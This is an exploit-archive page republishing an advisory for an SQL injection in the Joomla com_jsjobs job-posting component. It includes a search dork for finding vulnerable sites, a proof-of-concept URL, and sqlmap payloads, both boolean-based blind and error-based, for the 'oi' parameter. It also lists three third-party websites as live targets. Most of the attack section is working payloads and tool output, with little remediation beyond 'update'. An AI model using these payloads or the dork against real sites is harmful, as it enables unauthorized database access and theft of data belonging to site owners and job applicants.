Home / os / winme

Joomla com_jsjobs SQL injection Vulnerability

Posted on 30 November -0001

<HTML><HEAD><TITLE>Joomla com_jsjobs SQL injection Vulnerability</TITLE><META http-equiv="Content-Type" content="text/html; charset=utf-8"></HEAD><BODY>|✚✚✚✚✚✚✚✚✚✚✚✚✚✚✚✚✚✚✚✚✚✚✚ !! Exploit Title : Joomla com_jsjobs SQL injection Vulnerability !! Exploit Author : xBADGIRL21 !! Dork : inurl:index.php?option=com_jsjobs !! Vendor Homepage : http://www.joomsky.com !! MyBlog : http://xbadgirl21.blogspot.com/ !! version : 1.0.7.5 !! Tested on: [ BackBox] !! skype:xbadgirl21 !! Date: 31/08/2016 !! video Proof : https://youtu.be/ZBphlyFtNeo |✚✚✚✚✚✚✚✚✚✚✚✚✚✚✚✚✚✚✚✚✚✚✚ !! [★] DESCRIPTION : ✚ |✚✚✚✚✚✚✚✚✚✚✚✚✚✚✚✚✚✚✚✚✚✚✚ !! [+] Jsjobs is A component for job posting and resume submission. !! [+] AND an SQL injection has been Detected in this Joomla components jsjobs |✚✚✚✚✚✚✚✚✚✚✚✚✚✚✚✚✚✚✚✚✚✚✚ !! [★] Poc : !! |✚✚✚✚✚✚✚✚✚✚✚✚✚✚✚✚✚✚✚✚✚✚✚ !! [oi] Get Parameter Vulnerable To SQLi !! http://127.0.0.1/index.php?option=com_jsjobs&c=jsjobs&view=employer&layout=view_job&vj=2&oi=680' |✚✚✚✚✚✚✚✚✚✚✚✚✚✚✚✚✚✚✚✚✚✚✚ !! [★] SQLmap PoC : ✚ |✚✚✚✚✚✚✚✚✚✚✚✚✚✚✚✚✚✚✚✚✚✚✚ !! !! Parameter: oi (GET) !! [!] Type: boolean-based blind !! [!] Title: AND boolean-based blind - WHERE or HAVING clause !! [!] Payload: option=com_jsjobs&c=jsjobs&view=employer&layout=view_job&vj=2&oi=680 AND 3616=3616&Itemid=0&lang=en !! [!] !! [!] Type: error-based !! [!] Title: MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (FLOOR) !! [!] Payload: option=com_jsjobs&c=jsjobs&view=employer&layout=view_job&vj=2&oi=680 AND (SELECT 2727 FROM(SELECT COUNT(*),CONCAT(0x7170716a71, !! [!] (SELECT (ELT(2727=2727,1))),0x71627a7871,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a)&Itemid=0&lang=en !!++++++++++++++++++++++ !! GET parameter 'oi' is vulnerable. Do you want to keep testing the others (if any)? [y/N] |✚✚✚✚✚✚✚✚✚✚✚✚✚✚✚✚✚✚✚✚✚✚✚ !! [★] Live Demo : ✚ |✚✚✚✚✚✚✚✚✚✚✚✚✚✚✚✚✚✚✚✚✚✚✚ !! http://dev.selectmyjob.lu/index.php?option=com_jsjobs&c=jsjobs&view=employer&layout=view_job&vj=2&oi=680&Itemid=0&lang=en !! http://job.gastrobaiter.com/index.php?option=com_jsjobs&c=jsjobs&view=jobseeker&layout=list_subcategoryjobs&jobsubcat=279&Itemid=55&sortby=salaryrangedesc !! http://www.cultunet.com/index.php?option=com_jsjobs&c=jsjobs&view=jobseeker&layout=job_searchresults&Itemid=1&sortby=companydesc&lang=es |✚✚✚✚✚✚✚✚✚✚✚✚✚✚✚✚✚✚✚✚✚✚✚ !! [★] Solution ✚ |✚✚✚✚✚✚✚✚✚✚✚✚✚✚✚✚✚✚✚✚✚✚✚ !! Just Update to the Last Version {Test In Progress} |✚✚✚✚✚✚✚✚✚✚✚✚✚✚✚✚✚✚✚✚✚✚✚ !! [★] Discovered by : xBADGIRL21 !! [★] Greetz : All Mauritanien Hackers - NoWhere |✚✚✚✚✚✚✚✚✚✚✚✚✚✚✚✚✚✚✚✚✚✚✚ </BODY></HTML>

 

TOP

Malware :